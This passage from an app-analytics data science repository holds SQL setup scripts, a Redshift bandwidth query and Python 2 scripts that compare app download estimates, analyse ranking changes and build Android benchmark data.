SELECT
iso_code,cn.id as country_id
FROM appstore.countries cn
JOIN temp.countries_temp t ON t.element = cn.iso_code
;
-- EXCLUDED_APPLICATIONS --
SET @exclude_application_ids = REPLACE(TRIM(REPLACE(REPLACE(@exclude_application_ids,' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@exclude_application_ids,'temp.excluded_applications_temp','INT');
DROP TEMPORARY TABLE IF EXISTS temp.settings_excluded_apps;
CREATE TEMPORARY TABLE temp.settings_excluded_apps
(application_id INT unsigned NOT NULL PRIMARY KEY)
AS
SELECT a.id AS application_id
FROM appstore.applications a
JOIN temp.excluded_applications_temp t ON (t.element = a.id OR t.element = a.parent_id)
;
-- DOWNLOAD DAY WEIGHTS --
SET @day_weights = REPLACE(TRIM(REPLACE(REPLACE(@day_weights,' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@day_weights,'temp.day_weights_temp','DECIMAL(4,3)');
DROP TEMPORARY TABLE IF EXISTS temp.settings_day_weights;
CREATE TEMPORARY TABLE temp.settings_day_weights(
date date,
weight DECIMAL(4,3),
CONSTRAINT PRIMARY KEY (date)
) AS
SELECT
DATE(DATE_SUB(@date,INTERVAL id - 1 day)) as date,
element as weight
FROM temp.day_weights_temp
;
-- EXCHANGE RATES --
DROP TEMPORARY TABLE IF EXISTS temp.settings_exchange_rates;
CREATE TEMPORARY TABLE temp.settings_exchange_rates (
id smallint(11) unsigned,
rate decimal(12,6),
CONSTRAINT PRIMARY KEY (id)
) AS
SELECT
cr.id,
gc_foreign.code,
er.rate
FROM generic.exchange_rates er
JOIN generic.currencies gc_base ON gc_base.id = er.currency_id
JOIN generic.currencies gc_foreign ON gc_foreign.id = er.foreign_currency_id
/* look up specific store currency id's, since these may differ cross store */
JOIN appstore.currencies cr ON cr.code = gc_foreign.code
-- the number of days in this table is dependent on which ranking dates and dates from downloads table is used
WHERE er.date = DATE_SUB(@date,INTERVAL 1 day)
AND gc_base.code = 'USD'
;
-- APPSTORE INSTANCES --
DROP TEMPORARY TABLE IF EXISTS temp.settings_appstore_instances;
CREATE TEMPORARY TABLE temp.settings_appstore_instances(
appstore_instance_id SMALLINT(5) UNSIGNED NOT NULL,
country_id smallint(5) unsigned NOT NULL,
device_id TINYINT unsigned DEFAULT NULL,
CONSTRAINT PRIMARY KEY (appstore_instance_id)
)
AS
SELECT
ai.id AS appstore_instance_id,
ai.country_id,
ai.device_id
FROM appstore.appstore_instances ai
JOIN appstore.countries cn ON cn.id = ai.country_id
JOIN temp.settings_countries cs ON cs.iso_code = cn.iso_code
;
-- RANKCATEGORIES RANKINGS --
DROP TEMPORARY TABLE IF EXISTS temp.settings_rankcategories;
CREATE TEMPORARY TABLE temp.settings_rankcategories(
`rankcategory_id` SMALLINT(5) UNSIGNED NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
`category_id` SMALLINT(5) UNSIGNED NOT NULL,
CONSTRAINT PRIMARY KEY (rankcategory_id)
)
AS
SELECT
rc.id AS rankcategory_id,
rc.type,
rc.category_id
FROM appstore.rankcategories rc
JOIN appstore.categories c ON c.id = rc.category_id
WHERE rc.type IN ('free','paid','gross');
<file_sep>/aa_au_model/heavy_usage/sql/get_mdm_bandwidth.sql
-- Get bandwidth per device for iOS on MDM
-- Note: should be run on Redshift EDW
-- MONTHLY
select
guid_key,
max(dgm.platform) as platform,
max(dgm.device_type_snapshot) as device_type,
coalesce(sum(fam.domestic_mobile_bytes) / 1073741824, 0) as domestic_mobile_gb,
coalesce(sum(fam.roaming_mobile_bytes) / 1073741824, 0) as roaming_mobile_gb,
coalesce(sum(fam.domestic_wifi_bytes) / 1073741824, 0) as domestic_wifi_gb,
coalesce(sum(fam.roaming_wifi_bytes) / 1073741824, 0) as roaming_wifi_gb,
(
coalesce(sum(fam.domestic_mobile_bytes), 0) +
coalesce(sum(fam.roaming_mobile_bytes), 0) +
coalesce(sum(fam.domestic_wifi_bytes), 0) +
coalesce(sum(fam.roaming_wifi_bytes), 0)
) / 1073741824 as total_gb
from
edw.fact_app_monthly fam
join edw.dim_guid_monthly dgm
using(utc_date_key, guid_key)
join edw.dim_operator dop
on dgm.home_operator_key = dop.operator_key
join edw.dim_package dp
using(package_key)
where
fam.utc_date_key = 20150601
and dop.iso_country_code = 'us'
and not dgm.has_bad_record
and fam.reported_data_usage
and dgm.days_with_records >= 20
group by
utc_date_key,
guid_key
order by
total_gb desc
;
-- WEEKLY
select
guid_key,
max(dgm.platform) as platform,
max(dgm.device_type_snapshot) as device_type,
coalesce(sum(fam.domestic_mobile_bytes) / 1073741824, 0) as domestic_mobile_gb,
coalesce(sum(fam.roaming_mobile_bytes) / 1073741824, 0) as roaming_mobile_gb,
coalesce(sum(fam.domestic_wifi_bytes) / 1073741824, 0) as domestic_wifi_gb,
coalesce(sum(fam.roaming_wifi_bytes) / 1073741824, 0) as roaming_wifi_gb,
(
coalesce(sum(fam.domestic_mobile_bytes), 0) +
coalesce(sum(fam.roaming_mobile_bytes), 0) +
coalesce(sum(fam.domestic_wifi_bytes), 0) +
coalesce(sum(fam.roaming_wifi_bytes), 0)
) / 1073741824 as total_gb
from
edw.fact_app_weekly fam
join edw.dim_guid_weekly dgm
using(utc_date_key, guid_key)
join edw.dim_operator dop
on dgm.home_operator_key = dop.operator_key
join edw.dim_package dp
using(package_key)
where
fam.utc_date_key = 20150419
and dop.iso_country_code = 'us'
and not dgm.has_bad_record
and fam.reported_data_usage
and dgm.days_with_records >= 5
group by
utc_date_key,
guid_key
order by
total_gb desc
;
<file_sep>/aa_au_model/hive_scripts/workflow/module/constants.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
ONE_MONTH = 24 * 60 * 60 * 30
ONE_DAY = 24 * 60 * 60
class Status(object):
FAILED = 0
SUCCESS = 1
RUNNING = 2
# TO_BE_KILLED = 3
WONT_RUN = 4
class ErrorNumber(object):
WORKFLOW_NOT_EXIST = 100001
NODE_IS_NOT_A_TASK = 100002
RUNNING_ERROR = 100003
TASK_IS_RUNNING = 100004
WORKFLOW_IS_RUNNING = 100005
STATUS_LABEL = {
Status.FAILED: 'FAILED',
Status.RUNNING: 'RUNNING',
Status.SUCCESS: 'SUCCESS'
}
SCHEMA_PATH_MAPPING = {
'_o': 'oss',
'_d': 'dimension',
'_f': 'fact',
'_p': 'migration',
'_i': 'interface',
'_m': 'maintenance'
}
<file_sep>/evaluation/py/compare_model_estimates.py
'''
Created on Jul 2, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import os
from internal import stores_dict
import psycopg2
from pandas.io import sql
pd.set_option('use_inf_as_null', True)
def get_app_names(df, platform):
if platform == 'ios':
conn = psycopg2.connect("dbname=aa user=aa host=nile")
app_ids = df['app_id'].values
query = 'SELECT id as app_id, name as app_name FROM aa_app WHERE id in (%s)'%','.join(str(x) for x in app_ids)
elif platform == 'android':
conn = psycopg2.connect("dbname=aa_android user=aa host=nile")
app_ids = df.apply(lambda x: "'%s'"%x['app_id'], axis=1).values
query = 'SELECT class as app_id, name as app_name FROM app WHERE class in (%s)'%','.join(str(x) for x in app_ids)
app_names = sql.frame_query(query, con=conn)
df = df.merge(app_names, on='app_id', how='left')
conn.close()
return df
def get_actuals(df, file):
actuals = pd.read_csv(file)
df = df.merge(actuals, on=['app_id','date'], how='left')
return df
if __name__ == '__main__':
months = ['2013-03', '2013-04', '2013-05']
models = ['monthly', 'weekly', 'webui_preview', 'webui_final']
estimate_names = ['estimate_monthly', 'estimate_weekly', 'estimate_webui_preview', 'estimate_webui_final']
devices = ['android', 'ios']
store_ids = [10,9,7,27,3,143441,143465,143466,143462,143444]
unit_types = ['Downloads', 'USD']
files = {}
for (dirpath, dirnames, filenames) in os.walk('../data'):
for filename in filenames:
metadata = dirpath.split('/')
if 'est_daily_sbe' in metadata:
filepath = os.sep.join([dirpath, filename])
try:
files[filename]
except:
files[filename] = []
files[filename].append(filepath)
print files
result = []
for k, v in files.iteritems():
first = True
dfs = pd.DataFrame()
for filepath in v:
df = None
metadata = filepath.split('/')
device = metadata[2].split('_')[0]
model = '_'.join(metadata[2].split('_')[1:])
month = metadata[3]
store_id = int(metadata[5].split('_')[0])
unit_type = metadata[5].split('_')[1]
if device not in devices:
continue
if month not in months:
continue
if model not in models:
continue
if unit_type not in unit_types:
continue
if store_id not in store_ids:
continue
df = pd.read_csv(filepath)
print filepath
if unit_type=='Downloads':
df['estimate']=np.int64(df['estimate'])
df.rename(columns={'estimate': 'estimate_%s'%model}, inplace=True)
if first:
dfs = df.copy()
first = False
else:
dfs = dfs.merge(df, on=['app_id', 'date'], how='inner')
df = None
if dfs.shape[0]<1:
continue
filepath = filepath.replace('est_daily_sbe', 'real_daily_raw')
dfs = get_actuals(dfs, filepath)
total_actuals = dfs[dfs['units']>=0].groupby('app_id').size().reset_index()
total_actuals.rename(columns={0:'app_actuals_count'}, inplace=True)
dfs = dfs.groupby('app_id').sum().reset_index()
dfs = dfs.merge(total_actuals, on='app_id', how='left')
dfs = dfs.sort('estimate_monthly', ascending=False)
dfs['units'][dfs['app_actuals_count']<dfs['app_actuals_count'].max()]=None
for model in models:
#dfs[dfs['app_actuals_count']<dfs['app_actuals_count'].max()]['%s_absolute_error'%model] = None
dfs['%s_absolute_error'%model] = (dfs['units']-dfs['estimate_%s'%model]).abs()
dfs['%s_relative_error'%model] = dfs['%s_absolute_error'%model]*1.0/dfs['units']
if model=='monthly':
continue
dfs['monthly-%s_absolute_difference'%model] = (dfs['estimate_monthly']-dfs['estimate_%s'%model]).abs()
dfs['monthly-%s_relative_difference'%model] = dfs['monthly-%s_absolute_difference'%model]*1.0/dfs['estimate_monthly']
country_name = stores_dict.ios['country_dict'][store_id] if device=='ios' else stores_dict.android['country_dict'][store_id]
dfs = get_app_names(dfs,device)
dfs.to_csv('../data/compare_models/%s_%s_%s'%(country_name, device, k), index=False)
#dfs = dfs[(dfs['app_actuals_count']==dfs['app_actuals_count'].max()) | (pd.isnull(dfs['app_actuals_count']))]
dfs = dfs.drop('app_id', axis=1)
app_count = dfs.shape[0]
ranges = [20,200,1000,5000,10000, app_count]
res = []
mean_columns = {}
max_columns = {}
for column in dfs.columns:
mean_columns[column] = 'average_%s'%column
max_columns[column] = 'max_%s'%column
for range in ranges:
df = pd.DataFrame(dfs[:range].mean()).T
df.rename(columns=mean_columns, inplace=True)
df2 = pd.DataFrame(dfs[:range].max()).T
df2.rename(columns=max_columns, inplace=True)
df = pd.concat([df,df2], axis=1)
df['estimate_monthly_is_zero_count'] = dfs[dfs['estimate_monthly']==0].shape[0]
if range == app_count:
df['range'] = 'All'
else:
df['range'] = 'Top_%s'%range
df['units_count'] = dfs[:range][dfs['units']>=0].shape[0]
res.append(df)
res = pd.concat(res)
res['app_count'] = app_count
res['device'] = device
res['month'] = month
res['unit'] = unit_type
res['store_id'] = store_id
res['country'] = country_name
result.append(res)
result=pd.concat(result)
result.to_csv('../data/compare_models/result.csv',index=False)
<file_sep>/ranking_change/impact_finder.py
'''
Created on Aug 17, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import config
from sklearn import linear_model
import sklearn
import psycopg2
import datetime
import csv
from sklearn import cluster
import matplotlib.pyplot as plt
import pylab as pl
import scipy
MASTER_DATE = '2013-08-12'
DELTA_DAYS = 2
MAX_RANK = 100
REG_DAYS = 5
GET_RAW_DATA = True
MAKE_P_VALUES = True
MAKE_DIFFERENTIALS = True
metadata_f = '/Users/perezrafael/appannie/data/debug_file_20130827.csv'
def filter_df(df):
df = df[df['Rank']<=MAX_RANK]
df = df[df['Market']=='iPhone']
df = df[df['Type']=='Free']
return df
delta_features = set([
'Revenue', 'Downloads',
'Total IAP Download Units', 'Total IAP Revenue',
'Total App Download Units',
'Average Revenue Per IAP Transaction',
'% revenue on IAP items where IAP price is <= $2',
'% revenue on IAP items where IAP price is > $2',
'% revenue on IAP items where IAP price is > $5',
'% revenue on IAP items where IAP price is > $10',
'% revenue on IAP items where IAP price is > $20',
'% revenue on IAP items where IAP price is > $40',
'% revenue on IAP items where IAP price is > $80',
'IAP Refunds ($)',
'IAP Refunds (units)', 'IAP Promotions ($)',
'IAP Promotions (units)', 'Paid Refunds ($)',
'Paid Refunds (units)', 'Paid Promotions ($)',
'Paid Promotions (units)', '# App Updates'])
IAP_predictors = ['% revenue on IAP items where IAP price is <= $2',
'% revenue on IAP items where IAP price is > $2',
'% revenue on IAP items where IAP price is > $5',
'% revenue on IAP items where IAP price is > $10',
'% revenue on IAP items where IAP price is > $20',
'% revenue on IAP items where IAP price is > $40',
'% revenue on IAP items where IAP price is > $80',
'% IAP revenues coming from subscription', 'IAP Refunds ($)',
'IAP Refunds (units)', 'IAP Promotions ($)',
'IAP Promotions (units)']
NON_PREDICTORS = set(['Rank', 'Rank_delta', 'Date',
'App ID', 'Country', 'Category',
'Market', 'Type', 'App Name',
'Main Category', 'Publisher ID',
'Publisher Name', 'Release Date',
'App Name', 'Has IAP', 'IS Universal',
'Weekday'])
feed_type_format = {'IPHONE_FREE': 'Free',
'IPHONE_PAID': 'Paid',
'IPHONE_GROSSING': 'Grossing',
'IPAD_FREE': 'Free',
'IPAD_PAID': 'Paid',
'IPAD_GROSSING': 'Grossing',
}
feed_market_format = {'IPHONE_FREE': 'iPhone',
'IPHONE_PAID': 'iPhone',
'IPHONE_GROSSING': 'iPhone',
'IPAD_FREE': 'iPad',
'IPAD_PAID': 'iPad',
'IPAD_GROSSING': 'iPad',
}
CONN = None
def get_connection():
global CONN
if CONN is None:
CONN = psycopg2.connect('dbname=aa_staging_small user=aa host=nile')
return CONN
def read_sales(date, store_id, value_type, table_name, app_ids=None):
conn = get_connection()
cur = conn.cursor()
if app_ids is None:
sql = 'SELECT app_id, %s FROM %s WHERE date = %%s AND store_id = %%s' % (value_type, table_name)
else:
sql = 'SELECT app_id, %s FROM %s WHERE date = %%s AND store_id = %%s and app_id in (%s)' % (value_type, table_name, ','.join(map(str, app_ids)))
params = (date, store_id)
cur.execute(sql, params)
print cur.mogrify(sql, params)
for app_id, value in cur:
yield {'App ID': app_id, 'Value': value}
cur.close()
def train_test_models(df, split, predictors, target, days):
df = df.groupby(['Country', 'Category', 'Market', 'Type', 'App ID'])
#models = {}
#print predictors
result = []
for n, g in df:
algorithm = sklearn.feature_selection.SelectFpr(sklearn.feature_selection.f_regression)
try:
model = algorithm.fit(g[g['Date']<=split][-days:][predictors], g[g['Date']<=split][-days:][target])
#model = algorithm.fit(g[g['Date']<[split][predictors], g[g['Date']==split][target])
except:
continue
for predictor, score, p_value in zip(predictors, model.scores_, model.pvalues_):
print str((predictor, score, p_value))
g[predictor] = p_value
del g['Date']
del g['Rank']
del g[target]
g = g.drop_duplicates()
g['Date'] = split
result.append(g)
result = pd.concat(result)
return result
def make_date_range(start_date_inclusive, end_date_inclusive):
assert start_date_inclusive <= end_date_inclusive
def create():
d = start_date_inclusive
while d <= end_date_inclusive:
yield d
d = d + datetime.timedelta(1)
return tuple(create())
def get_delta(df, columns, days):
dfs = df.groupby(['Country', 'Category', 'Market', 'Type', 'App ID'])
result=[]
for n,g in dfs:
g = g.sort('Date', ascending=True)
for column in columns:
for day in range(1, days):
rolling_mean = pd.stats.moments.rolling_mean(g[column].shift(),day)*1.0
g['%s_delta_%s'%(column, day)] = (g[column]-rolling_mean)/rolling_mean
g['%s_delta_%s'%(column, day)] = g['%s_delta_%s'%(column, day)].fillna(0)
result.append(g)
result = pd.concat(result)
return result
def get_rolling_sum(df, columns, days):
dfs = df.groupby(['Country', 'Category', 'Market', 'Type', 'App ID'])
result=[]
for n,g in dfs:
g = g.sort('Date', ascending=True)
for column in columns:
g['rolling_sum_%s_days_%s'%(days, column)] = pd.stats.moments.rolling_sum(g[column], days)
result.append(g)
result = pd.concat(result)
return result
def get_rolling_sum_b(df, columns, days):
dfs = df.groupby(['App ID'])
result=[]
for n,g in dfs:
g = g.sort('Date', ascending=True)
for column in columns:
g['%s_rolling_sum_%s_days'%(column, days)] = pd.stats.moments.rolling_sum(g[column], days)
result.append(g)
result = pd.concat(result)
return result
def compare_weekdays(df, group_by):
result = []
gb_date = list(group_by)
gb_date.append('Date')
df = df.groupby(gb_date).mean().reset_index()
df = df.groupby(group_by)
for n, g in df:
dates = g['Date'].drop_duplicates().order()
if dates is None or dates.shape[0]<8:
continue
for date in dates:
if dates[dates<=date][-8:].shape[0]<8:
continue
g2 = None
date2 = dates[dates<=date][-8:][:1].values[0]
g2 = pd.concat([g[g['Date']==date], g[g['Date']==date2]])
g2 = g2.sort('Date', ascending=True).set_index(gb_date).diff().reset_index()[-1:]
if g2 is not None:
result.append(g2)
#for predictor in predictors:
# g[predictor][g['Date']==date] = g[g['Date']==date][predictor].values[0] - g[g['Date']==date2][predictor].values[0]
result = pd.concat(result)
#result = result.drop(['App ID', 'Main Category', 'Publisher ID'], axis=1)
result = result.set_index(gb_date)
result = result.reindex_axis(sorted(result.columns), axis=1).reset_index()
return result
def preprocess_metadata(df):
df = df[df['AVG'] == 'F']
del df['AVG']
del df['Start Date']
del df['End Date']
del df['Rank Link']
del df['Daily Estimate']
del df['Customize']
del df['Included']
del df['Value']
df['Country'] = df['Store'].apply(lambda x: config.IOS_STORES_DICT[x])
del df['Store']
df['Category'] = df['Category'].apply(lambda x:config.IOS_CATEGORIES_DICT[x])
#del df['Category']
df['Type'] = df['Feed'].apply(lambda x: feed_type_format[x])
df['Market'] = df['Feed'].apply(lambda x: feed_market_format[x])
del df['Feed']
df.rename(columns={'Day':'Date'}, inplace=True)
return df
def cluster_apps(df, index):
columns = set(df.columns.values)
columns = list(columns.difference(set(index)))
#model = cluster.KMeans(n_clusters=12)
#model = cluster.DBSCAN(eps=0.3, min_samples=5)
#model.fit(df[columns].values)
#labels = model.labels_
#df['cluster'] = labels
distances = sklearn.metrics.pairwise.pairwise_distances(
df[columns].values,
metric=scipy.spatial.distance.correlation)
#distances = pd.DataFrame(distances)
df['Target'] = None
df['Weight'] = None
#df['distances'] = pd.Series(list(distances), dtype=np.dtype('object'))
max = np.nanmax(distances)
for i in range(df.shape[0]):
distances[i][i]= max
minindex = np.nanargmin(distances[i]) + 1
min = np.nanmin(distances[i])
df['Target'][:i+1][-1:] = df['App ID'][:minindex][-1:].values[0]
df['Weight'][:i+1][-1:] = min
return df, distances
def main():
if GET_RAW_DATA:
df = preprocess_metadata(pd.read_csv(metadata_f))
#df = filter_df(df)
#all_apps = np.int64(df['App ID'].drop_duplicates())
#sales_df = []
#downloads_df = []
#for date in make_date_range(datetime.date(2013, 7, 1), datetime.date(2013, 8, 19)):
# day_df = pd.DataFrame(list(read_sales(date, 143441, 'revenue', 'sales', all_apps)))
# day_df['Date'] = str(date)
# sales_df.append(day_df)
# day_df2 = pd.DataFrame(list(read_sales(date, 143441, 'units', 'downloads', all_apps)))
# day_df2['Date'] = str(date)
# downloads_df.append(day_df2)
#sales_df = pd.concat(sales_df)
#downloads_df = pd.concat(downloads_df)
#sales_df['Revenue'] = sales_df['Value']
#del sales_df['Value']
#downloads_df['Downloads'] = downloads_df['Value']
#del downloads_df['Value']
#sales_df = sales_df.merge(downloads_df, how='outer', on=['Date', 'App ID'])
#df = df.merge(sales_df, on=['App ID', 'Date'])
df = df.fillna(0)
#df = get_delta(df, delta_features, DELTA_DAYS)
#df = get_delta(df, ['Rank'], 2)
#df = df.replace([np.inf, -np.inf], np.nan)
#df = df.dropna(axis=1,how='all')
#df = df.fillna(0)
df.to_csv('data/impact/raw.csv', index=False)
else:
df = pd.read_csv('data/impact/raw.csv')
target = 'Rank'
if MAKE_P_VALUES:
predictors = set(df.columns.values)
predictors = predictors.difference(NON_PREDICTORS)
predictors = list(predictors)
print df[predictors]
#df[target] *= -1.0
results = []
DATES = make_date_range(datetime.date(2013, 8, 5), datetime.date(2013, 8, 19))
for date in DATES:
res = train_test_models(df, str(date), predictors, target, REG_DAYS)
results.append(res)
results = pd.concat(results)
results.to_csv('data/impact/result_raw.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
predictors.remove(target)
results = results.fillna(1.0)
results.to_csv('data/impact/result.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
else:
results = pd.read_csv('data/impact/result.csv')
app_index = ['Country', 'Category', 'Market', 'Type', 'App ID', 'App Name', 'Main Category', 'Publisher ID', 'Has IAP']
IAP_elements = [s for s in results.columns.values if "IAP" in s]
IAP_elements.remove('Has IAP')
non_app_index = list(set(results.columns).difference(set(app_index)))
non_IAP_app_index = list(set(non_app_index).difference(set(IAP_elements)))
if MAKE_DIFFERENTIALS:
differentials = compare_weekdays(results, ['Country', 'Category', 'Market', 'Type', 'Has IAP'])
differentials.to_csv('data/impact/differentials.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
app_differentials = compare_weekdays(results, app_index)
app_differentials.to_csv('data/impact/app_differentials.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
else:
differentials = pd.read_csv('data/impact/differentials.csv')
app_differentials = pd.read_csv('data/impact/app_differentials.csv')
clusters = []
app_index.append('Date')
app_index.append('Has IAP')
app_index2 = list(app_index)
app_index2.extend(IAP_elements)
ndf = app_differentials[app_differentials['Date']<'2013-08-17']
clusters = []
distances = []
master_set = ndf[['App ID']][ndf['Date']==MASTER_DATE].drop_duplicates()
ndf = ndf[ndf['App ID'].isin(master_set['App ID'])]
ndf = ndf.sort(['App ID', 'Date'])
for n, g in ndf.groupby(['Date']):
clustered, dist = cluster_apps(g, app_index)
clusters.append(clustered)
distances.append(dist)
clusters = pd.concat(clusters)
clusters.to_csv('data/impact/clustered.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
dist_dict = {}
first_pass = True
count = 0
for (n, g), d in zip(clusters.groupby(['Date']), distances):
for app_id, d2 in zip(g['App ID'], d):
if first_pass:
dist_dict[app_id] = d2.copy()
else:
dist_dict[app_id] += d2
first_pass = False
count +=1
master_set['Target'] = None
master_set['Weight'] = None
for k in dist_dict:
dist_dict[k] /= count
minindex = np.nanargmin(dist_dict[k]) + 1
min = np.nanmin(dist_dict[k])
if not np.isnan(minindex):
target = master_set['App ID'][:minindex][-1:].values[0]
master_set['Target'][master_set['App ID']==k] = target
master_set['Weight'][master_set['App ID']==k] = min
mean_p = results[results['Date']>=MASTER_DATE]
mean_p = mean_p[mean_p['Date']<'2013-08-17']
mean_p = mean_p.groupby(['App ID', 'App Name', 'Has IAP', 'Publisher Name', 'IS Universal', 'Main Category']).mean().reset_index()
#df2 = df[df['Date']==MASTER_DATE]
#df2 = df2[['App ID', 'App Name', 'Has IAP', 'Publisher Name', 'IS Universal', 'Main Category']]
graph = master_set.merge(mean_p, on=['App ID'])
app_index.remove('App ID')
app_index.append('Source')
graph.rename(columns={'App ID': 'Id', 'App Name':'Label'}, inplace=True)
#graph[['Id', 'Label', 'Has IAP', 'Publisher Name', 'IS Universal', 'Main Category']].drop_duplicates().to_csv('data/impact/nodes.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
graph.to_csv('data/impact/nodes.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
graph = graph.rename(columns={'Id': 'Source'})
graph[['Source', 'Target', 'Weight']].to_csv('data/impact/edges.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
if __name__ == '__main__':
main()
<file_sep>/betty_benchmark_android/gen_benchmark_data_android.py
##
# gen_benchmakr_data_android
# Department: Data Science
# Author: <NAME>
# Create: Nov 26, 2013
# Description: Generate android benchmark data
# To Do: Change input, database paths, change output path, changes to load all store_ids, change output format to bz2, output date range
# OUTPUT FILE format: 'store_id', 'category_id', 'feed_id', 'date', 'app_id', 'actual', 'rank', 'has_event_flag', 'est'
##
#import pdb
import sys
import os
import pandas as pd
import psycopg2
import numpy as np
import datetime
import config
from sklearn.cross_validation import KFold
import bz2
import statsmodels.regression.linear_model as sm
#import matplotlib.cm as cm
#import zipfile
#import StringIO
#import datetime as dt
#import matplotlib.dates as mdates
#import itertools
import csv
#from scipy import optimize
#DB_ACTUALS_STRING = 'dbname=aa_staging_android user=aa host=nile'
#DB_EVENTS_STRING = 'dbname=aa_android user=aa host=nile'
#DB_APPID_STRING = 'dbname=aa_android user=aa host=nile'
DB_ACTUALS_STRING = 'dbname=aa_staging_android user=aa host=10.38.48.145 port=5432'
DB_EVENTS_STRING = 'dbname=aa_android user=aa host=10.38.48.134 port=6432'
DB_APPID_STRING = 'dbname=aa_android user=aa host=10.38.48.134 port=6432'
#COMPRESSED_RANKING_FILES_PATH = '/Users/antony/workspace/data/rank_files_android' if len(sys.argv) != 2 else sys.argv[1]
COMPRESSED_RANKING_FILES_PATH = '/mnt/data/android-ranks' if len(sys.argv) != 2 else sys.argv[1]
OUTPUT_FILES_PATH = '/home/antony/projects/aa/data_science/benchmark_android'
if not os.path.isdir(COMPRESSED_RANKING_FILES_PATH):
print 'Expecting compressed ranking files in directory %s' % COMPRESSED_RANKING_FILES_PATH
print 'You can specify it in sys.argv[1]'
sys.exit(2)
CONN = None
def get_connection(conn_string):
global CONN
if CONN is None:
CONN = psycopg2.connect(conn_string)
return CONN
#def load_ranks_csv_zip(path):
# filehandle = open(path, 'rb')
# zfile = zipfile.ZipFile(filehandle)
# data = StringIO.StringIO(zfile.read(zfile.namelist()[0])) #don't forget this line!
# df = pd.read_csv(data)
# return df
def load_ranks_file(path, store_ids=None, ranking_category_str_filter=None):
filename = os.path.split(path)[1]
assert filename.startswith('Android-Ranking-')
assert filename.endswith('.csv.bz2')
filename_date_str = filename[len('Android-Ranking-'):-len('.csv.bz2')]
filename_date = datetime.datetime.strptime(filename_date_str, '%Y-%m-%d').date()
ranking_feed_str_filter = frozenset(map(str, config.ANDROID_FEEDS_DICT.keys()))
if ranking_category_str_filter is None:
ranking_category_str_filter = frozenset(map(str, config.ANDROID_CATEGORIES_DICT.values()))
else:
ranking_category_str_filter = frozenset(ranking_category_str_filter)
#f = open(path, 'r' )
f = bz2.BZ2File(path, 'r')
android_df = []
for line in f:
assert line.startswith(filename_date_str)
line_split = line.split(',')
#print line_split
#print line
ranking_date_str, ranking_store_str, ranking_category_str, ranking_feed_str, ranking_list_str_unsplit = line_split
if str(config.ANDROID_STORE_SHORTCUTS_TO_ID_DICT[ranking_store_str]) not in store_ids:
continue
if ranking_feed_str not in ranking_feed_str_filter:
continue
if ranking_category_str not in ranking_category_str_filter:
continue
store_id = str(config.ANDROID_STORE_SHORTCUTS_TO_ID_DICT[ranking_store_str])
category_id = ranking_category_str
feed_id = ranking_feed_str
assert ranking_list_str_unsplit.endswith('\n')
ranking_list_str_split = ranking_list_str_unsplit.rstrip().split(' ')
df = pd.DataFrame(ranking_list_str_split).reset_index()
df.rename(columns={0:'app', 'index':'rank'}, inplace=True)
df['rank'] = df['app'].apply(lambda x: x.split('-')[0])
df['date'] = ranking_date_str
df['store_id'] = store_id
df['category_id'] = category_id
df['feed_id'] = feed_id
df['app_class'] = df['app'].apply(lambda x: x.split('-')[1])
#df.rename(columns={'rank': 'iphone_rank'}, inplace=True)
android_df.append(df)
f.close()
android_df = pd.concat(android_df)
android_df[['app_class', 'date', 'store_id', 'category_id', 'feed_id']] = android_df[['app_class', 'date', 'store_id', 'category_id', 'feed_id']].applymap(str)
del android_df['app']
#print android_df
return android_df
def daterange(start_date, end_date):
result = []
for n in range(int ((end_date - start_date).days)):
result.append(start_date + datetime.timedelta(n))
return result
def get_appid():
conn = get_connection(DB_APPID_STRING)
cur = conn.cursor()
sql = 'SELECT class, id from app'
cur.execute(sql)
df = pd.DataFrame(list(cur))
df.rename(columns={0:'app_class', 1:'app_id'}, inplace=True)
df[['app_class', 'app_id']] = df[['app_class', 'app_id']].applymap(str)
df.drop_duplicates()
return df
def get_actuals(store_id, start_d, end_d, table_name, value_type):
conn = get_connection(DB_ACTUALS_STRING)
cur = conn.cursor()
sql = 'SELECT app_class, date(date) as date, store_id, %s FROM %s WHERE date >= %%s AND date <= %%s AND store_id = %%s' % (value_type, table_name)
params = (start_d, end_d, store_id)
print('loading %s'%table_name)
cur.execute(sql, params)
result = pd.DataFrame(list(cur))
#result[['app_class', 'date', 'store_id']] = result[['app_class', 'date', 'store_id']].applymap(str)
cur.close()
if result.empty == True:
cols = ['app_class', 'date', 'store_id', table_name]
result = pd.DataFrame(columns = cols)
else:
result.rename(columns={0:'app_class', 1:'date', 2:'store_id', 3: table_name}, inplace=True)
result.drop_duplicates()
return result
def get_events(store_id, start_d, end_d):
conn = get_connection(DB_EVENTS_STRING)
cur = conn.cursor()
sql = 'SELECT distinct app_id, date(date) as date, store_id, type FROM event WHERE date >= %s AND date <= %s AND store_id = %s'
params = (start_d, end_d, store_id)
print('loading events')
#print cur.mogrify(sql, params)
cur.execute(sql, params)
result = pd.DataFrame(list(cur))
cur.close()
if result.empty == True:
cols = ['app_id', 'date', 'store_id', 'has_event_flag']
result = pd.DataFrame(columns = cols)
else:
result.rename(columns={0:'app_id', 1:'date', 2:'store_id', 3:'type'}, inplace=True)
del result['type']
result['has_event_flag'] = 1
result.drop_duplicates()
return result
def get_ranks(store_id, dataDates, app_class_id):
path = COMPRESSED_RANKING_FILES_PATH
category_ids = map(str, config.ANDROID_CATEGORIES_DICT.values())
ranks_df = []
for single_date in dataDates:
file = '%s/Android-Ranking-%s.csv.bz2'%(path, single_date.strftime('%Y-%m-%d'))
print 'loading %s'%file
df = load_ranks_file(file, store_id, category_ids)
ranks_df.append(df)
ranks_df = pd.concat(ranks_df)
#app_class_id = get_appid()
#print app_class_id
#print app_class_id.head()
#print ranks_df
#print ranks_df.head()
ranks_df = ranks_df.merge(app_class_id, on=['app_class'], how='left')
ranks_df = ranks_df.dropna(subset=['app_id'])
ranks_df.drop_duplicates()
return ranks_df
def process_store_date(df, date):
date = date.strftime("%Y-%m-%d")
